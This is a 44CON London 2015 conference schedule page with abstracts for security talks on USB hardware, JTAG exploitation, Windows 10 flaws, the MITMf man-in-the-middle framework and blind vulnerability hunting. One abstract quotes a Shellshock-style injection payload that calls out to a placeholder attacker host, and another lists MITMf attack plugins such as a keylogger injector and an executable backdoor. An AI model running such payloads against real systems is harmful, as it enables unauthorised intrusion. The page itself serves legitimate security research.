The security features of the USB armory System on a Chip (SoC), combined with the openness of the board design, is meant to empower developers and users with a fully customizable USB trusted device for open and innovative personal security applications.

The presentation explores the lessons learned in making a small form factor, high specifications, embedded device with solely open source tools, its architecture and security features such as secure boot and ARM TrustZone implementation.

The security applications of the implemented concept are explored, illustrating the advantage of an open USB device with increased computational power.

The first open source application for the platform, developed by Inverse Path, for advanced file encryption functionality, will also be covered.

Speakers

Andrea Barisani

Andrea Barisani is an internationally recognized security researcher. Since owning his first Commodore-64 he has never stopped studying new technologies, developing unconventional attack vectors and exploring what makes things tick...and break. His experiences focus on large-scale... Read More →

Friday September 11, 2015 11:30 - 12:29 BST
Track 2

Track 2 Talk

11:30 BST

Hands-on JTAG for fun and root shells

JTAG may be almost 30 years old with little change, but that doesn't mean most people really understand what it does and how. This workshop will start with a brief introduction to what JTAG really is, then quickly dive into some hands-on practice with finding, wiring, and finally exploiting a system via JTAG.
For this UK-themed workshop, we'll target a Raspberry Pi (Cambridge) with an ARM (also Cambridge) microprocessor. In order to interact with the system, we'll use a JTAG interface cable from FTDI (Glasgow). We won't do any hardware modifications, but we will hook up wires in weird and wonderful ways to make the Raspberry Pi do things it otherwise shouldn't.
You will need a computer that can boot a Linux USB drive.
Kits will be available for sale at the registration desk.

Speakers

Joe FitzPatrick

Friday September 11, 2015 11:30 - 13:29 BST
Workshop

Workshop

12:30 BST

Lunch

Friday September 11, 2015 12:30 - 13:59 BST
Track 1

Networking

12:30 BST

Lunch

Friday September 11, 2015 12:30 - 13:59 BST
Track 2

Networking

13:30 BST

Lunch

Friday September 11, 2015 13:30 - 14:29 BST
Workshop

Networking

14:00 BST

Windows 10: 2 Steps Forward, 1 Step Back

Windows 10 is shaping up to be one of the most secure consumer operating systems yet, it includes many new security features baked in such as Control Flow Guard and Credentials Isolation. But new features have a habit of coming with additional bugs which only serve to reduce the security of the system at the same time.

This presentation will describe a few of the new security features introduced into Windows 10 as well as some of the vulnerabilities I’ve discovered which demonstrate that secure engineering is still very difficult in practice.

Speakers

James

James is a security researcher in Google’s Project Zero. He has been involved with computer hardware and software security for over 10 years looking at a range of different platforms and applications. With a great interest in logical vulnerabilities he’s been listed as the #1... Read More →

Friday September 11, 2015 14:00 - 14:59 BST
Track 1

Track 1 Talk

14:00 BST

MITMf: Bringing Man-In-The-Middle attacks to the 21'st century

Tired of managing countless scripts for automating your Man-In-The-Middle attacks?
Have a cool idea for a MITM attack, but don't want to spend hours writing a script from scratch?
Tired of bashing your head against the wall trying to figure out why Ettercap's filters are not working?
Well look no further!
MITMf combines new and old MITM techniques into a framework! Written in Python, It's built to be extremely extendible and reliable , while updating the current MITM attacks for the 21st century!
Currently the following plugins are available:
Responder - LLMNR, NBT-NS, WPAD and MDNS poisoner
SSLstrip+ - Partially bypass HSTS
Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing
BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
AppCachePoison - Perform App cache poisoning attacks
Ferret-NG - Transparently hijacks sessions
BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
CacheKill - Kills page caching by modifying headers
FilePwn - Backdoor executables being sent over HTTP using the Backdoor Factory and BDFProxy
Inject - Inject arbitrary content into HTML content
BrowserSniper - Performs drive-by attacks on clients with out-of-date browser plugins
jskeylogger - Injects a javascript keylogger into clients webpages
Replace - Replace arbitary content in HTML content
SMBAuth - Evoke SMB challenge-response auth attempts
Upsidedownternet - Flips images 180 degrees

Available on Github ! https://github.com/byt3bl33d3r/MITMf

Speakers

Marcello Salvati

Slightly paranoid IT security enthusiast/researcher with a pathological addiction to Sherlock Holmes novels, Sushi, Video Games and being in the middle.

Friday September 11, 2015 14:00 - 14:59 BST
Track 2

Track 2 Talk

14:30 BST

Old Dog, New Tricks: Forensics With PowerShell

Speakers

Jared Atkinson

Friday September 11, 2015 14:30 - 15:59 BST
Workshop

Workshop

15:00 BST

Responsible disclosure: who cares?

Both OJ and Dan have been conducting security assessments for years. Occasionally a discovery is made which warrants discreetly contacting the vendor in question to let them know several thousand (or million) of their devices have a major vulnerability. Sometimes the vendor takes notice and subsequently takes action, however sadly on most occasions they either feign effort, completely ignore the researcher, or openly say 'go away'. These are a couple stories of how responsible disclosure was attempted, but the company in question couldn't be troubled to help themselves.

Dan will articulate the story of events surrounding the recent goatse-ing of a sign in Atlanta, Georgia. LED billboards are apparently just like every other "IoT" style device - completely open, completely public, you just have to know where to look. A little shodanning and one can find any number of colorful things on the internet. Dan will tell the story about his attempts to notify this sign company shortly before they got goatse'd, their interactions before and after and the demeanor in which one can conduct oneseself when going about turning a security disclosure into a conference talk. We will check live on stage to see how many of these things still exist, as well.

OJ will tell a horrible tale of his first ever disclosure experience, one that involved a very large vendor of consumer storage products. The story consists of initial vulnerability discovery, analysis, and exploitation, and then leads into what seemed like an endless back-and-forth with the vendor over a series of months. There were lows, and there were highs. The former outnumbered the latter. There was much derp! All will be shared in its lulzy glory, in gory detail, up to and including a discussion with the vendor's CSO. The story will end with an opinion. A strong one. OJ will also be trawling shodan to show how many boxes are still vuln. He will be going through the exploit step by step and explaining how things were discovered.

Speakers

OJ Reeves

Founder, Beyond Binary

Dan Tentler

Dan Tentler is a Co-Founder of Carbon Dynamics, specializing in Attack Simulation. He currently manages the Attack Simulation division of the organization. He shouts on the internet, quite a lot, occasionally talks to the news. Angry old man of the internet.

Friday September 11, 2015 15:00 - 15:59 BST
Track 1

Track 1 Talk

15:00 BST

Hunting Asynchronous Vulnerabilities

In blackbox tests vulnerabilities can lurk out of sight in backend functions and background threads. Issues with no visible symptoms like blind second order SQL injection and shell command injection via nightly cronjobs or asynchronous logging functions can easily survive repeated pentests and arrive in production unfixed.

The only way to reliably hunt these down is using exploit-induced callbacks. That is, for each potential vulnerability X send an exploit that will ping your server if it fires, then patiently listen.

In this presentation, I'll show that exploit-induced callbacks can be taken far beyond () { :;}; echo 1 > /dev/udp/evil.com/53 to find blind and asynchronous XXE, (DOM)XSS, SQli, SMTP and even pure XML injection. I'll examine a range of techniques to coax applications into issuing a callback by any means possible. These will start out clean and simple and quickly degenerate into crude cross-technology/platform multi-context exploit chains, some of which are definitely not advisable for production servers.

This presentation will also cover coping strategies for some of the innate hazards associated with hosting the infrastructure required to automate finding these vulnerabilities.

Speakers

James Kettle

Director of Research, PortSwigger Web Security

James Kettle is Director of Research at PortSwigger Web Security, where he designs and refines vulnerability detection techniques for Burp Suite's scanner. Recent work has focused on using web cache poisoning to turn caches into exploit delivery systems. James has extensive experience... Read More →

Friday September 11, 2015 15:00 - 15:59 BST
Track 2

Track 2 Talk

16:00 BST

44CON LONDON 2015 Closing

The closing 30 minutes. giveaways and fun!

Friday September 11, 2015 16:00 - 16:30 BST
Track 1

Track 1 Talk